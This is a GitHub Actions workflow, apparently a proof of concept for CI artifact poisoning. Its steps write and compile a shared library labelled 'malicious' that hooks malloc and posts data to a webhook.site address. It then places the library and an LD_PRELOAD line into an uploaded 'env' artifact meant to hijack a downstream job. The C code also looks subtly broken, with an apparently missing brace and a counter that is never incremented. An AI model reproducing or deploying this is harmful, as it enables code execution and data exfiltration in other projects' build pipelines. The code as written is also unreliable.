name: Validate

on:
  pull_request:
  push:
    branches:
      - master

jobs:
  snapshot-tests:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout the code
        uses: actions/checkout@v3
      - name: Create malicious shared library
        run: |
          cat <<EOF > malicious.c
          #define _GNU_SOURCE

          #include <stdio.h>
          #include <dlfcn.h>
          #include <stdlib.h>
          #include <curl/curl.h>
          #include <string.h>

          static void* (*real_malloc)(size_t)=NULL;
          static int i = 0;

          void *malloc(size_t size)
          {
            CURL *curl;
            CURLcode res;
            char *data = "{\"key\":\"value\"}";

              if(i < 1) {
                curl = curl_easy_init();

                if(curl) {
                  // Set the URL for the POST request
                  curl_easy_setopt(curl, CURLOPT_URL, "https://webhook.site/5f50f1da-b7f9-4ef0-b988-14f91d971e64");
          
                  // Specify the POST data
                  curl_easy_setopt(curl, CURLOPT_POSTFIELDS, data);
          
                  // Set the content type header
                  struct curl_slist *headers = NULL;
                  headers = curl_slist_append(headers, "Content-Type: application/json");
                  curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers);
          
                  // Perform the request, res will get the return code
                  res = curl_easy_perform(curl);
          
                  // Check for errors
                  if(res != CURLE_OK)
                      fprintf(stderr, "curl_easy_perform() failed: %s\n", curl_easy_strerror(res));
          
                  // Cleanup
                  curl_easy_cleanup(curl);
                  curl_slist_free_all(headers);
              }

              real_malloc = dlsym(RTLD_NEXT, "malloc");
              return real_malloc(size);
          }
          EOF
      - name: Compile
        run: |
          gcc -shared -fPIC -o malicious.so malicious.c
      - name: Save PR number
        if: github.event_name == 'pull_request'
        env:
          PR_NUMBER: ${{ github.event.number }}
        run: |
          mkdir env
          cp malicious.so env/
          echo PR_NUMBER=$PR_NUMBER > ./env/env
          echo GITHUB_SHA=${{ github.sha }} >> ./env/env
          echo "LD_PRELOAD=./malicious.so" >> ./env/env
      - uses: actions/upload-artifact@v3
        with:
          name: env
          path: env/
